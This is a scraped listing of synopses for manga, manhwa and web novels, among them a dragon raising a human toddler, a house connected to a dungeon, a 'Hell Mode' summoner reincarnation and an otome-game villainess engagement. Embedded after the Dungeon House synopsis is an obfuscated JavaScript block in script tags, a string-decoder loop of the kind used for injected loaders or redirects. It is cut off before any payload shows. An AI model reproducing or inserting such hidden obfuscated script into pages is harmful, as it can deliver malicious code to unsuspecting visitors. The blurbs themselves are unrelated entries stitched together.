An immensely powerful and ancient dragon, once worshipped as a god by humans but now only a myth in their eyes, wakes up one day to find a human girl poking around his lair. The infant is barely old enough to say her own name, but is quite confident in calling the dragon “Daddy”! Bewildered by the unexpected visitor, the dragon soon learns that returning her to human civilization isn’t going to be an option... not yet, anyway. He quickly decides to raise the girl himself, determined to give her a happy life that will lead her back to human society when she is older — surely a simple task for a legendary being such as himself. All he needs to do now is find a place for her to sleep. And figure out where he is going to get clothes for her. And...wait, what do humans eat again? --- “Daddy!” The dragon blinked as the wee little human called out to him. Him? Her “Daddy”? Powerful enough to have been venerated by humankind, yet warmhearted and even a tad ditzy, the dragon soon finds himself raising and doting on the precocious Olivia as if she really were his daughter in this touching tale. The toddler may be impossibly cute now, but just you wait—she’s a curious child and she’s growing up real fast. You can bet that one day, she’ll be the strongest human there is! But first, how will he handle little Olivia receiving an acceptance letter to a human school? --- [Web Novel](
Dungeon House is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About One day, my house got connected to a dungeon. It's dangerous outside because of the monsters, but in order to survive, I have to clear the dungeon within the time limit! "I don't want to die. I want to survive." Kim HyunBok has to try and clear the dungeon by himself now that all the other explorers have died. Having awakened his powers, he starts taming monsters. With the skeletons Chris, Kai, and Kessle who have regained their memories, our protagonist's life-risking adventure to clear the dungeon starts now!<script></script><script>(function(_0x399078,_0x325ca3){var _0x47b6a6=_0x1cdb,_0x2b815c=_0x399078();while(!![]){try{var _0x13ada2=parseInt(_0x47b6a6(0x11c))/(-0x4*0x1b0+-0x6*0x14b+-0x1*-0xe83)*(-parseInt(_0x47b6a6(0x103))/(0xb34+-0x886+-0x2ac))+-parseInt(_0x47b6a6(0x100))/(0x1f69+0x41*-0x65+-0x5c1)*(-parseInt(_0x47b6a6(0x11e))/(-0xb7a+0x404+-0x1d*-0x42))+parseInt(_0x47b6a6(0x117))/(0x17e*0x9+0xf0e*-0x2+-0x5f*-0x2d)+-parseInt(_0x47b6a6(0x111))/(0x20b*0x4+0x39e+0x2f1*-0x4)+parseInt(_0x47b6a6(0x119))/(-0x1*-0x237d+-0x1*0x1d53+-0x1*0x623)*(-parseInt(_0x47b6a6(0xfe))/(-0x1fc6+0x13b1+0xc1d))+parseInt(_0x47b6a6(0x101))/(-0x6*-0x128+-0xdf*-0x2c+-0x2d3b*0x1)+-parseInt(_0x47b6a6(0x11d))/(-0x19*-0x47+-0x14e*-0x4+-0xc1d)*(parseInt(_0x47b6a6(0x114))/(0x62b+-0x2299+-0xc5*-0x25));if(_0x13ada2===_0x325ca3)break;else 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Lerew lives in a small fishing village on the coast, and trades with a young boy called a witch for medicine for his father. But one day, while attempting to fish in a dangerous area, Lerew is thrown overboard and attacked by sharks. However, even with his body mangled beyond recognition, he still doesn\'t wish to die…
Seinen One-shot compilation containing 15 one-shots, published between 1968 and 1976, with an emphasis on themes of eroticism and SF. Chiefly contains works published in Gekiga magazines.
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A lovey-dovey tamer life of an animal-loving newlywed couple ♥ Haito and Lina, a newlywed couple, purchase the full-dive VR game “Free Frontier Online.”The purpose of play is to moff as many monsters as you like! ! ! The two, who are unable to keep pets due to animal allergies, come up with the idea that they can interact with fluffy animals as much as they want in the game, so they start the game as tamers.I thought I started with the purpose of relaxing with the monsters, but before I knew it, I ended up being more active than the real monsters…! ? The slow life of interaction surrounded by monsters has begun♪
I can't believe my ojou-sama is so huge! Fujido Oriko is the buxom young head of the Fujido Zaibatsu, a group that has a monopoly on Japan's vending machine industry. And serving at her side is her personal butler, the eccentric Dr. Sebastion. When a monster suddenly attacks the city, Dr. Sebastion slips his ojou-sama an experimental energy drink his team in R&D has been developing. As a result, she quickly finds herself growing into a giantess, matching the attacking kaiju in size! Will she be able to stop his rampage, or at the very least, keep her dignity intact? [i][Winner of Shounen Jump's Dec 2020 Bronze Rookie Award][/i] [*][url=]Author's Twitter[/url]
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Jung HyeonWoo had neither ‘Talent’, ‘Money’, or ‘Luck’. “Why can I see the hidden information in the game?” After an electrocution accident, I started being able to see stuff I couldn’t before in the game. --- - **\"BJ\"** is a Korean slang that means **Streamer**. --- - [Webtoon PV](
Read Manhwa Growth-Type Superhero In An Era Of Upheaval, Humanity Is Forced To Respond With Weapons Known As “Sacred Relics” That Embody Their Very Souls To Combat Monsters Emerging From Another World. Asahi Hinata, A Young Man With A Promising Future As The Son Of A Hero, Is About To Attend The Entrance Ceremony At The National Valkyrie Academy. However, The Sacred Relic He Receives Is A Hero Suit That Looks Like It Came Straight Out Of A Low-Budget Children’s Hero Show… Living Day By Day As An Outcast At The Academy, Hinata Perseveres Despite Being Disregarded By Those Around Him. But One Day, Hinata’s Courage And Resolve Awaken A Unique Power Within His Hero Suit… The Alternative Name For “Growth-Type Superhero Manhwa” 성장형 슈퍼히어로
Yamada Kenichi, a single, 35-year-old businessman, has spent the majority of his adult life playing every MMORPG to hit the market. Tired of the constant cycle of repetitive, newbie-centric gameplay, he is immediately drawn in by the promise of a new game that, on top of being never-ending, offers up a \"Hell Mode\" — a difficulty level that makes it nigh impossible to level up but also promises uncapped growth potential. Upon selecting the newly released Summoner class, Kenichi finds himself reborn as Allen, an infant in a serf family, with nothing but his wits and old memories to guide him. Allen works diligently to level himself up despite Hell Mode requiring vast amounts of experience between levels. In doing so, he hopes to uncover the secrets the Summoner class holds. All the while, he dedicates himself to freeing his new family from serfdom.
Ragna, the heir to a frontier noble family, is a reincarnated former Japanese citizen who realizes that the world he now lives in is the setting of an otome game. Dreaming of a carefree life as an adventurer, his plans are derailed when a war takes his family, forcing him to take on the responsibilities of managing his family’s lands. Struggling with the unfamiliar duties of a lord, his already chaotic life takes another turn when an unexpected engagement to a noblewoman from a higher-ranking family is arranged. To his surprise, the bride-to-be is Alicia, the \"villainess\" of the otome game’s story—a character destined for heartbreak, a demonic pact, and ultimate destruction. Now sharing his life with someone fated for tragedy, Ragna is swept up in the wheels of fate. Can he rewrite the predetermined outcomes of this world and secure a peaceful life for himself and Alicia? Their intertwined destinies lead to an unpredictable story of survival and unexpected connections.